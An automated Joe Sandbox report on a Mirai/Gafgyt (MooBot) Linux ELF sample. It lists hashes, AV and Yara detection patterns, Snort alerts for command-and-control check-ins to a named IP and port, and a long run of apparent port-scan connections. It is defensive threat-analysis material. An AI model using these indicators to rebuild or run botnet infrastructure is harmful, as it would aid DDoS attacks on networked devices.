Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
b3CaTUFeSZ.elf

Overview

General Information

Sample name:b3CaTUFeSZ.elf
renamed because original name is a hash value
Original sample name:76214a23fd27271b5198fc0cb9325e65.elf
Analysis ID:1417888
MD5:76214a23fd27271b5198fc0cb9325e65
SHA1:6ea3dbaf7d6e6649937246a0e08b49f394d20cfb
SHA256:51d6a0fe7af5afcb81617782c492947e8d0c9140ef3c24f47791fe5baa2d38e6
Tags:32elfmipsmirai
Infos:

Detection

Mirai, Gafgyt
Score:92
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Detected Mirai
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Gafgyt
Connects to many ports of the same IP (likely port scanning)
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
HTTP GET or POST without a user agent
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.
Static ELF header machine description suggests that the sample might not execute correctly on this machine.
Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures.
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1417888
Start date and time:2024-03-31 08:40:16 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 7s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:b3CaTUFeSZ.elf
renamed because original name is a hash value
Original Sample Name:76214a23fd27271b5198fc0cb9325e65.elf
Detection:MAL
Classification:mal92.troj.linELF@0/8@1/0
  • Report size exceeded maximum capacity and may have missing network information.
Command:/tmp/b3CaTUFeSZ.elf
PID:5430
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
done.
Standard Error:
  • system is lnxubuntu20
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
NameDescriptionAttributionBlogpost URLsLink
Bashlite, GafgytBashlite is a malware family which infects Linux systems in order to launch distributed denial-of-service attacks (DDoS). Originally it was also known under the name Bashdoor, but this term now refers to the exploit method used by the malware. It has been used to launch attacks of up to 400 Gbps.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite
SourceRuleDescriptionAuthorStrings
b3CaTUFeSZ.elfJoeSecurity_GafgytYara detected GafgytJoe Security
    b3CaTUFeSZ.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
    • 0x27340:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x27354:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x27368:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x2737c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x27390:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x273a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x273b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x273cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x273e0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x273f4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x27408:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x2741c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x27430:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x27444:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x27458:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x2746c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x27480:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x27494:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x274a8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x274bc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x274d0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    SourceRuleDescriptionAuthorStrings
    5430.1.00007f305c400000.00007f305c42b000.r-x.sdmpJoeSecurity_GafgytYara detected GafgytJoe Security
      5430.1.00007f305c400000.00007f305c42b000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
      • 0x27340:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x27354:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x27368:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x2737c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x27390:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x273a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x273b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x273cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x273e0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x273f4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x27408:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x2741c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x27430:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x27444:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x27458:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x2746c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x27480:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x27494:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x274a8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x274bc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x274d0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      Process Memory Space: b3CaTUFeSZ.elf PID: 5430Linux_Trojan_Gafgyt_28a2fe0cunknownunknown
      • 0x6992:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x69a6:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x69ba:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x69ce:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x69e2:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x69f6:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x6a0a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x6a1e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x6a32:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x6a46:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x6a5a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x6a6e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x6a82:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x6a96:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x6aaa:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x6abe:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x6ad2:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x6ae6:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x6afa:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x6b0e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x6b22:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      Timestamp:03/31/24-07:41:01.673193
      SID:2030490
      Source Port:57802
      Destination Port:56789
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:03/31/24-07:41:54.345825
      SID:2030489
      Source Port:56789
      Destination Port:57802
      Protocol:TCP
      Classtype:A Network Trojan was detected

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: b3CaTUFeSZ.elfAvira: detected
      Source: b3CaTUFeSZ.elfReversingLabs: Detection: 61%
      Source: b3CaTUFeSZ.elfVirustotal: Detection: 50%Perma Link

      Networking

      barindex
      Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.13:57802 -> 45.152.86.86:56789
      Source: TrafficSnort IDS: 2030489 ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response 45.152.86.86:56789 -> 192.168.2.13:57802
      Source: global trafficTCP traffic: 45.152.86.86 ports 56789,5,6,7,8,9
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 207.59.119.102:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 201.18.89.102:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 101.128.208.16:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 173.46.122.241:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 179.83.105.178:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 166.2.180.120:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 97.245.99.232:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 101.115.216.202:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 125.186.141.164:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 146.2.82.59:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 19.20.225.196:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 159.101.6.98:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 35.129.178.192:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 137.129.163.200:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 67.171.250.49:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 199.101.80.217:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 190.118.112.196:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 124.2.0.72:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 146.33.86.163:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 160.220.32.15:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 23.74.56.46:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 206.184.63.185:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 216.6.71.236:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 9.171.153.133:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 1.137.2.77:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 160.88.91.224:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 115.60.38.25:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 70.186.17.24:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 160.101.215.184:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 104.86.49.149:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 88.202.34.150:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 167.157.44.145:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 18.103.17.167:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 204.129.15.113:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 116.138.24.148:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 163.9.172.203:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 18.239.137.114:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 9.254.98.188:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 41.142.167.204:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 187.113.220.30:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 44.201.218.149:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 165.134.226.147:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 18.13.71.24:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 41.42.74.18:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 72.175.112.17:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 79.77.225.164:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 8.74.215.194:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 188.67.109.83:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 190.239.178.184:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 170.12.245.207:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 71.239.212.145:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 63.235.216.47:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 184.107.77.71:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 125.42.79.249:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 71.167.255.198:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 77.122.107.27:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 149.11.147.210:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 118.28.82.27:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 32.131.200.145:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 150.28.64.123:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 107.161.60.202:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 216.33.78.19:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 57.186.222.106:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 161.52.46.235:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 48.220.38.105:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 62.26.12.153:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 34.167.8.64:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 72.83.177.87:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 96.116.118.204:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 64.46.79.209:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 174.243.193.202:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 154.79.88.202:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 161.107.169.31:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 213.46.129.167:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 109.184.124.154:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 200.243.16.154:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 164.209.166.244:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 152.216.146.255:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 123.41.231.136:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 49.120.242.12:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 68.92.203.159:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 158.204.54.72:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 219.216.178.19:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 152.63.241.177:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 58.153.198.32:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 176.84.68.145:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 139.203.33.102:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 203.100.91.122:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 35.80.56.180:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 173.198.84.81:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 219.79.136.115:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 31.225.234.236:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 183.169.179.240:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 197.42.219.80:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 18.29.152.17:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 35.14.242.220:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 162.146.13.227:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 134.223.223.92:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 93.151.166.210:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 157.250.133.207:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 82.213.10.84:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 128.218.41.248:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 122.152.194.97:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 103.146.140.145:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 208.20.110.241:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 76.141.100.229:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 45.229.21.38:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 143.82.200.46:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 200.122.141.77:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 62.214.106.176:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 110.118.184.10:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 173.223.28.43:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 140.241.5.137:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 194.243.133.130:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 76.245.79.55:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 24.210.139.162:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 184.185.172.70:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 105.117.84.112:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 202.80.59.101:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 208.185.12.188:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 94.30.3.64:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 86.75.40.132:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 155.149.200.161:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 99.61.36.195:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 24.27.81.67:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 35.15.16.175:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 14.244.99.177:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 179.113.169.135:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 204.253.252.183:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 87.115.40.168:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 4.148.80.88:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 62.111.67.34:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 37.228.185.134:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 24.98.65.118:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 206.227.189.181:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 71.71.159.200:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 66.155.93.169:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 86.84.75.181:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 209.220.115.0:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 178.55.20.129:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 186.89.195.72:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 85.138.140.223:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 78.135.119.13:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 13.111.233.192:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 168.148.76.246:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 72.69.36.182:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 218.54.83.222:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 171.43.134.61:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 159.214.253.177:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 128.216.208.245:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 211.49.202.162:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 49.39.158.12:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 126.12.40.56:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 169.5.174.134:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 8.80.47.171:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 5.3.187.78:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 169.187.86.189:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 168.181.84.253:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 191.41.180.229:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 121.53.163.129:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 91.7.91.20:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 152.221.250.191:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 139.190.255.79:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 8.249.147.113:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 165.231.183.208:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 18.23.176.16:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 150.245.43.249:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 99.81.219.173:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 144.26.137.184:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 139.145.148.253:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 106.203.119.132:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 84.95.250.178:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 155.229.168.211:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 184.60.182.180:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 32.204.62.26:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 17.252.160.48:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 213.223.213.196:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 154.74.215.74:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 173.65.68.221:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 152.246.93.156:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 100.24.180.122:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 134.173.168.208:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 36.115.137.96:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 44.111.175.103:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 128.183.126.194:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 212.187.10.221:8080
